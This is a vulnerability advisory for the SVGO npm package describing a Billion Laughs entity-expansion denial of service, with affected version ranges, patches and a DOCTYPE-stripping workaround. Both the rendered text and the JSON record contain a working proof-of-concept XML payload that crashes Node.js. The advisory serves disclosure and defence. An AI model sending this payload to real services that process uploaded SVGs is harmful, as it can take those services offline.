GHSA-XPQW-6GX7-V673

Vulnerability from github – Published: 2026-03-04 22:59 – Updated: 2026-03-06 21:58
VLAI?
Summary
SVGO DoS through entity expansion in DOCTYPE (Billion Laughs)
Details

Summary

SVGO accepts XML with custom entities, without guards against entity expansion or recursion. This can result in a small XML file (811 bytes) stalling the application and even crashing the Node.js process with JavaScript heap out of memory.

Details

The upstream XML parser (sax) doesn't interpret custom XML entities by default. We pattern matched custom XML entities from the DOCTYPE, inserting them into parser.ENTITIES, and enabled unparsedEntities. This gives us the desired behavior of supporting SVGs with entities declared in the DOCTYPE.

However, entities can reference other entities, which can enable small SVGs to explode exponentially when we try to parse them.

Proof of Concept

import { optimize } from 'svgo';

/** Presume that this string was obtained in some other way, such as network. */
const original = `
  <?xml version="1.0"?>
  <!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ELEMENT lolz (#PCDATA)>
  <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
  <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
  <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
  <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
  <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
  ]>
  <lolz>&lol9;</lolz>
`;

optimize(original);

Impact

If SVGO is run on untrusted input (i.e., user uploaded to server-side application), then the untrusted SVG can effectively stall or crash the application with an SVG < 1 KB in size.

It's unlikely to impact users who just use SVGO locally on their own SVGs or in build pipelines.

Patches

SVGO has patched v4.0.1, v3.3.3, and v2.8.1! However, it's strongly recommended to upgrade to v4 regardless, as previous versions are not officially supported anymore.

Workarounds

== 4.0.0

For v4, users do not specifically have to upgrade SVGO, though it is recommended to do so. A package manager can be used to upgrade sax recursively:

For example:

yarn up -R sax

New options were introduced upstream which makes the way SVGO parses SVGs safe by default.

>= 2.1.0, <= 3.3.2

Users of v3 and v2 will have to take manual action. If users can't upgrade, they may be able to work around this as long as the project doesn't require support for custom XML entities, though it's not a simple flag.

Parse the DOCTYPE directly and check for the presence of custom entities. If entities are present, throw/escape before passing them to SVGO.

+ import SAX from 'sax';
  import { optimize } from 'svgo';

- const original =`
+ let original = `
    <?xml version="1.0"?>
    <!DOCTYPE lolz [
    <!ENTITY lol "lol">
    <!ELEMENT lolz (#PCDATA)>
    <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
    <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
    <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
    <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
    <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
    <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
    <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
    <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
    <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
    ]>
    <lolz>&lol9;</lolz>
  `;

+ const parser = SAX.parser();
+ /** @param {string} doctype */
+ parser.ondoctype = (doctype) => {
+   original = original.replace(doctype, '');
+ }
+ parser.write(original);

  optimize(original);

Resources

Severity ?
7.5 (High)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "svgo"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.1.0"
            },
            {
              "fixed": "2.8.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "svgo"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.0.0"
            },
            {
              "fixed": "3.3.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "svgo"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.0.0"
            },
            {
              "fixed": "4.0.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ],
      "versions": [
        "4.0.0"
      ]
    }
  ],
  "aliases": [
    "CVE-2026-29074"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-776"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-04T22:59:28Z",
    "nvd_published_at": "2026-03-06T08:16:26Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n\nSVGO accepts XML with custom entities, without guards against entity expansion or recursion. This can result in a small XML file (811 bytes) stalling the application and even crashing the Node.js process with `JavaScript heap out of memory`.\n\n### Details\n\nThe upstream XML parser ([sax](https://www.npmjs.com/package/sax)) doesn\u0027t interpret custom XML entities by default. We pattern matched custom XML entities from the `DOCTYPE`, inserting them into `parser.ENTITIES`, and enabled `unparsedEntities`. This gives us the desired behavior of supporting SVGs with entities declared in the `DOCTYPE`.\n\nHowever, entities can reference other entities, which can enable small SVGs to explode exponentially when we try to parse them.\n\n#### Proof of Concept\n\n```js\nimport { optimize } from \u0027svgo\u0027;\n\n/** Presume that this string was obtained in some other way, such as network. */\nconst original = `\n  \u003c?xml version=\"1.0\"?\u003e\n  \u003c!DOCTYPE lolz [\n  \u003c!ENTITY lol \"lol\"\u003e\n  \u003c!ELEMENT lolz (#PCDATA)\u003e\n  \u003c!ENTITY lol1 \"\u0026lol;\u0026lol;\u0026lol;\u0026lol;\u0026lol;\u0026lol;\u0026lol;\u0026lol;\u0026lol;\u0026lol;\"\u003e\n  \u003c!ENTITY lol2 \"\u0026lol1;\u0026lol1;\u0026lol1;\u0026lol1;\u0026lol1;\u0026lol1;\u0026lol1;\u0026lol1;\u0026lol1;\u0026lol1;\"\u003e\n  \u003c!ENTITY lol3 \"\u0026lol2;\u0026lol2;\u0026lol2;\u0026lol2;\u0026lol2;\u0026lol2;\u0026lol2;\u0026lol2;\u0026lol2;\u0026lol2;\"\u003e\n  \u003c!ENTITY lol4 \"\u0026lol3;\u0026lol3;\u0026lol3;\u0026lol3;\u0026lol3;\u0026lol3;\u0026lol3;\u0026lol3;\u0026lol3;\u0026lol3;\"\u003e\n  \u003c!ENTITY lol5 \"\u0026lol4;\u0026lol4;\u0026lol4;\u0026lol4;\u0026lol4;\u0026lol4;\u0026lol4;\u0026lol4;\u0026lol4;\u0026lol4;\"\u003e\n  \u003c!ENTITY lol6 \"\u0026lol5;\u0026lol5;\u0026lol5;\u0026lol5;\u0026lol5;\u0026lol5;\u0026lol5;\u0026lol5;\u0026lol5;\u0026lol5;\"\u003e\n  \u003c!ENTITY lol7 \"\u0026lol6;\u0026lol6;\u0026lol6;\u0026lol6;\u0026lol6;\u0026lol6;\u0026lol6;\u0026lol6;\u0026lol6;\u0026lol6;\"\u003e\n  \u003c!ENTITY lol8 \"\u0026lol7;\u0026lol7;\u0026lol7;\u0026lol7;\u0026lol7;\u0026lol7;\u0026lol7;\u0026lol7;\u0026lol7;\u0026lol7;\"\u003e\n  \u003c!ENTITY lol9 \"\u0026lol8;\u0026lol8;\u0026lol8;\u0026lol8;\u0026lol8;\u0026lol8;\u0026lol8;\u0026lol8;\u0026lol8;\u0026lol8;\"\u003e\n  ]\u003e\n  \u003clolz\u003e\u0026lol9;\u003c/lolz\u003e\n`;\n\noptimize(original);\n```\n\n### Impact\n\nIf SVGO is run on untrusted input (i.e., user uploaded to server-side application), then the untrusted SVG can effectively stall or crash the application with an SVG \u003c 1\u00a0KB in size.\n\nIt\u0027s unlikely to impact users who just use SVGO locally on their own SVGs or in build pipelines.\n\n### Patches\n\nSVGO has patched v4.0.1, v3.3.3, and v2.8.1! However, it\u0027s strongly recommended to upgrade to v4 regardless, as previous versions are not officially supported anymore.\n\n### Workarounds\n\n#### == 4.0.0\n\nFor v4, users do not specifically have to upgrade SVGO, though it is recommended to do so. A package manager can be used to upgrade sax recursively:\n\nFor example:\n\n```sh\nyarn up -R sax\n```\n\nNew options were introduced upstream which makes the way SVGO parses SVGs safe by default.\n\n#### \u003e= 2.1.0, \u003c= 3.3.2\n\nUsers of v3 and v2 will have to take manual action. If users can\u0027t upgrade, they may be able to work around this as long as the project doesn\u0027t require support for custom XML entities, though it\u0027s not a simple flag.\n\nParse the DOCTYPE directly and check for the presence of custom entities. If entities are present, throw/escape before passing them to SVGO.\n\n```diff\n+ import SAX from \u0027sax\u0027;\n  import { optimize } from \u0027svgo\u0027;\n\n- const original =`\n+ let original = `\n    \u003c?xml version=\"1.0\"?\u003e\n    \u003c!DOCTYPE lolz [\n    \u003c!ENTITY lol \"lol\"\u003e\n    \u003c!ELEMENT lolz (#PCDATA)\u003e\n    \u003c!ENTITY lol1 \"\u0026lol;\u0026lol;\u0026lol;\u0026lol;\u0026lol;\u0026lol;\u0026lol;\u0026lol;\u0026lol;\u0026lol;\"\u003e\n    \u003c!ENTITY lol2 \"\u0026lol1;\u0026lol1;\u0026lol1;\u0026lol1;\u0026lol1;\u0026lol1;\u0026lol1;\u0026lol1;\u0026lol1;\u0026lol1;\"\u003e\n    \u003c!ENTITY lol3 \"\u0026lol2;\u0026lol2;\u0026lol2;\u0026lol2;\u0026lol2;\u0026lol2;\u0026lol2;\u0026lol2;\u0026lol2;\u0026lol2;\"\u003e\n    \u003c!ENTITY lol4 \"\u0026lol3;\u0026lol3;\u0026lol3;\u0026lol3;\u0026lol3;\u0026lol3;\u0026lol3;\u0026lol3;\u0026lol3;\u0026lol3;\"\u003e\n    \u003c!ENTITY lol5 \"\u0026lol4;\u0026lol4;\u0026lol4;\u0026lol4;\u0026lol4;\u0026lol4;\u0026lol4;\u0026lol4;\u0026lol4;\u0026lol4;\"\u003e\n    \u003c!ENTITY lol6 \"\u0026lol5;\u0026lol5;\u0026lol5;\u0026lol5;\u0026lol5;\u0026lol5;\u0026lol5;\u0026lol5;\u0026lol5;\u0026lol5;\"\u003e\n    \u003c!ENTITY lol7 \"\u0026lol6;\u0026lol6;\u0026lol6;\u0026lol6;\u0026lol6;\u0026lol6;\u0026lol6;\u0026lol6;\u0026lol6;\u0026lol6;\"\u003e\n    \u003c!ENTITY lol8 \"\u0026lol7;\u0026lol7;\u0026lol7;\u0026lol7;\u0026lol7;\u0026lol7;\u0026lol7;\u0026lol7;\u0026lol7;\u0026lol7;\"\u003e\n    \u003c!ENTITY lol9 \"\u0026lol8;\u0026lol8;\u0026lol8;\u0026lol8;\u0026lol8;\u0026lol8;\u0026lol8;\u0026lol8;\u0026lol8;\u0026lol8;\"\u003e\n    ]\u003e\n    \u003clolz\u003e\u0026lol9;\u003c/lolz\u003e\n  `;\n\n+ const parser = SAX.parser();\n+ /** @param {string} doctype */\n+ parser.ondoctype = (doctype) =\u003e {\n+   original = original.replace(doctype, \u0027\u0027);\n+ }\n+ parser.write(original);\n\n  optimize(original);\n```\n\n### Resources\n\n* [Wikipedia: Billion laughs attack](https://en.wikipedia.org/wiki/Billion_laughs_attack)",
  "id": "GHSA-xpqw-6gx7-v673",
  "modified": "2026-03-06T21:58:08Z",
  "published": "2026-03-04T22:59:28Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/svg/svgo/security/advisories/GHSA-xpqw-6gx7-v673"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29074"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/svg/svgo"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "SVGO DoS through entity expansion in DOCTYPE (Billion Laughs)"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.